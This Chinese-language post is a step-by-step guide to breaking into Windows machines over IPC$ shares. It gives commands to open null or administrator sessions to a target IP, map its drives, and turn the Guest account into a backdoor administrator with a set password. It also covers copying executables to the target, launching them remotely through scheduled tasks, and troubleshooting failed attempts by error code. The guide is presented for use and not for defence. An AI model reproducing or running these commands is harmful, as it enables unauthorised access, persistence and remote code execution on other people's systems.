前提条件

启动服务

首先保证目标的IPC服务启动，服务为lanmanWorkstation，显示名为Workstations

端口

telnet目标计算机lanmanWorkstation服务的两个端口，即139和445

telnet ip 139

telnet ip 445

启动目标IPC共享

这些要在目标计算机下执行

net share ipc$

关闭

net share ipc$ /del

步骤

建立ipc$连接

net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格) 

net use \\222.222.221.102\ipc$ "" /user:"administrator"

删除一个ipc$连接

net use \\IP\ipc$ /del 

映射远程共享:

 net use z: \\IP\Disk$ 

net use z: \\222.222.221.102\d$

删除共享映射 

net use z: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

查看远程主机的共享资源（但看不到默认共享） 

net view \\IP 

添加以后登录账号(以下命令要在目标主机执行，目标主机重启后可用)

查看用户名

net user

查看帐户的属性

net user 帐户名 

激活Guest用户

net user guest /active:yes

修改Guest密码

net user guest 123456

Guest变为Administrator

net localgroup administrators guest /add

可以将

net user guest /active:yes

net user guest 123456

net localgroup administrators guest /add

写成bat拷贝到目标计算机去执行。

远程执行bat

1.向远程主机复制文件 

copy \路径\srv.exe \\IP\共享目录名，如： 

copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内 

2.远程添加执行计划任务 

at \\ip 时间 程序名，如： 

at \\127.0.0.0 11:00 love.exe 

注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径

可以用同开启权限的方式去开启telnet服务，然后telnet目标主机

目标主机开启了telnet的话可以

telnet 目标IP

输入刚才留的账户和密码

失败原因

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

根据返回的错误号分析原因：

错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到网络路径 : 网络有问题；

错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1327，用户账户限制阻止了此用户进行登录；

错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。